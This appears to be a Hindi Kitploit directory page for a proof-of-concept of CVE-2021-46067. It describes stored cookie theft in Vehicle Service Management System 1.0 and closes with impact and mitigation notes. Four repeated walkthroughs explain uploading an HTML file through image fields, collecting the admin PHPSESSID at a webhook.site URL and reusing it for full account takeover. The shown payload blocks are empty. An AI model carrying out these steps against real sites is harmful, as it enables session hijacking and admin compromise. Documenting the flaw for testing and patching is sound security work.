Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-46067 — CVE-2021-46067 - Vehicle Service Management System 1.0 में एक हमलावर कुकीज़ चुरा सकता है, जिससे पूर्ण खाता अधिग्रहण (Full Account Takeover) हो सकता है। | Kitploit
उपकरण/GitHubGitHub/sanupl/cve-2021-46067
फ़िशिंग उपकरणशोषणपहचान छुपाने के उपकरणवेब एप्लिकेशन शोषणसामाजिक इंजीनियरिंगप्रमाणीकरण
GitHubsanupl/cve-2021-46067

CVE-2021-46067

CVE-2021-46067 - Vehicle Service Management System 1.0 में एक हमलावर कुकीज़ चुरा सकता है, जिससे पूर्ण खाता अधिग्रहण (Full Account Takeover) हो सकता है।

रिपॉजिटरी देखें
164 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-46067

एक्सप्लॉइट शीर्षक: व्हीकल सर्विस मैनेजमेंट सिस्टम - 'मल्टीपल' कुकी स्टीलिंग से पूर्ण खाता अधिग्रहण

एक्सप्लॉइट लेखक: SANU P.L

CVE: CVE-2021-46067

CVSS: 9.8 गंभीर

संदर्भ:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46067
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46067

विवरण:

व्हीकल सर्विस मैनेजमेंट सिस्टम 1.0 में एक हमलावर कुकीज़ चुरा सकता है जिससे पूर्ण खाता अधिग्रहण (Full Account Takeover) होता है।

1. व्हीकल सर्विस मैनेजमेंट सिस्टम - 'MyAccount' (/admin/?page=user)

एक्सप्लॉइट:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. My Account अनुभाग पर जाएँ http://localhost/vehicle_service/admin/?page=user
  3. वेबहुक URL जनरेट करें - https://webhook.site
  4. वेबहुक अद्वितीय URL कॉपी करें और नीचे दिए गए html कोड में पेस्ट करें।

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. उपरोक्त html कोड को सहेजें जैसे: Cookie Stealing.html
  2. My Account अनुभाग में सभी आवश्यक विवरण दर्ज करें और Avatar में html फ़ाइल चुनें।
  3. अपडेट बटन पर क्लिक करें।
  4. अवतार छवि को नए टैब में खोलें और वेबहुक स्थिति जाँचें।
  5. हमें अनुरोध मिला जिसमें PHPSESSID शामिल है।
  6. PHPSESSID मान कॉपी करें और कोई अन्य ब्राउज़र खोलें।
  7. एडमिन पैनल पर जाएँ http://localhost/vehicle_service/admin
  8. कुकी मान जाँचें और PHPSESSID मान को कॉपी किए गए PHPSESSID मान से बदलें।
  9. अब एडमिन पैनल एक्सेस करें http://localhost/vehicle_service/admin
  10. खाते में सफलतापूर्वक लॉगिन किया गया। खाता अधिग्रहण सफल रहा।

2. व्हीकल सर्विस मैनेजमेंट सिस्टम - 'User List' (/admin/?page=user/manage_user)

एक्सप्लॉइट:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. User List अनुभाग पर जाएँ और Create New बटन पर क्लिक करें।
  3. वेबहुक URL जनरेट करें - https://webhook.site
  4. वेबहुक अद्वितीय URL कॉपी करें और नीचे दिए गए html कोड में पेस्ट करें।

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. उपरोक्त html कोड को सहेजें जैसे: Cookie Stealing.html
  2. Create New User अनुभाग में सभी आवश्यक विवरण दर्ज करें और Avatar में html फ़ाइल चुनें।
  3. Save बटन पर क्लिक करें।
  4. अवतार छवि को नए टैब में खोलें और वेबहुक स्थिति जाँचें।
  5. हमें अनुरोध मिला जिसमें PHPSESSID शामिल है।
  6. PHPSESSID मान कॉपी करें और कोई अन्य ब्राउज़र खोलें।
  7. एडमिन पैनल पर जाएँ http://localhost/vehicle_service/admin
  8. कुकी मान जाँचें और PHPSESSID मान को कॉपी किए गए PHPSESSID मान से बदलें।
  9. अब एडमिन पैनल एक्सेस करें http://localhost/vehicle_service/admin
  10. खाते में सफलतापूर्वक लॉगिन किया गया। खाता अधिग्रहण सफल रहा।

3. व्हीकल सर्विस मैनेजमेंट सिस्टम - 'Settings-System Logo' (/admin/?page=system_info)

एक्सप्लॉइट:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. Settings अनुभाग पर जाएँ http://localhost/vehicle_service/admin/?page=system_info
  3. वेबहुक URL जनरेट करें - https://webhook.site
  4. वेबहुक अद्वितीय URL कॉपी करें और नीचे दिए गए html कोड में पेस्ट करें।

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. उपरोक्त html कोड को सहेजें जैसे: Cookie Stealing.html
  2. Settings अनुभाग में सभी आवश्यक विवरण दर्ज करें और System Logo में html फ़ाइल चुनें।
  3. अपडेट बटन पर क्लिक करें।
  4. System Logo छवि को नए टैब में खोलें और वेबहुक स्थिति जाँचें।
  5. हमें अनुरोध मिला जिसमें PHPSESSID शामिल है।
  6. PHPSESSID मान कॉपी करें और कोई अन्य ब्राउज़र खोलें।
  7. एडमिन पैनल पर जाएँ http://localhost/vehicle_service/admin
  8. कुकी मान जाँचें और PHPSESSID मान को कॉपी किए गए PHPSESSID मान से बदलें।
  9. अब एडमिन पैनल एक्सेस करें http://localhost/vehicle_service/admin
  10. खाते में सफलतापूर्वक लॉगिन किया गया। खाता अधिग्रहण सफल रहा।

4. व्हीकल सर्विस मैनेजमेंट सिस्टम - 'Settings-Website Cover' (/admin/?page=system_info)

एक्सप्लॉइट:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. Settings अनुभाग पर जाएँ http://localhost/vehicle_service/admin/?page=system_info
  3. वेबहुक URL जनरेट करें - https://webhook.site
  4. वेबहुक अद्वितीय URL कॉपी करें और नीचे दिए गए html कोड में पेस्ट करें।

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>

</body>
</html>
  1. उपरोक्त html कोड को सहेजें जैसे: Cookie Stealing.html
  2. Settings अनुभाग में सभी आवश्यक विवरण दर्ज करें और Website Cover में html फ़ाइल चुनें।
  3. अपडेट बटन पर क्लिक करें।
  4. Website Cover छवि को नए टैब में खोलें और वेबहुक स्थिति जाँचें।
  5. हमें अनुरोध मिला जिसमें PHPSESSID शामिल है।
  6. PHPSESSID मान कॉपी करें और कोई अन्य ब्राउज़र खोलें।
  7. एडमिन पैनल पर जाएँ http://localhost/vehicle_service/admin
  8. कुकी मान जाँचें और PHPSESSID मान को कॉपी किए गए PHPSESSID मान से बदलें।
  9. अब एडमिन पैनल एक्सेस करें http://localhost/vehicle_service/admin
  10. खाते में सफलतापूर्वक लॉगिन किया गया। खाता अधिग्रहण सफल रहा।

प्रभाव:

एक हमलावर दुर्भावनापूर्ण html फ़ाइल अपलोड करता है जो तीसरे पक्ष की वेबसाइट पर पुनर्निर्देशित करती है और अनुरोध में कुकीज़ उजागर हो जाती हैं। इससे पूर्ण खाता अधिग्रहण होता है।

शमन:

अनुशंसा की जाती है कि फ़ाइल अपलोड कार्यक्षमता को मान्य करें और सत्र में द्वितीयक जाँच करें।

टूल डाउनलोड करें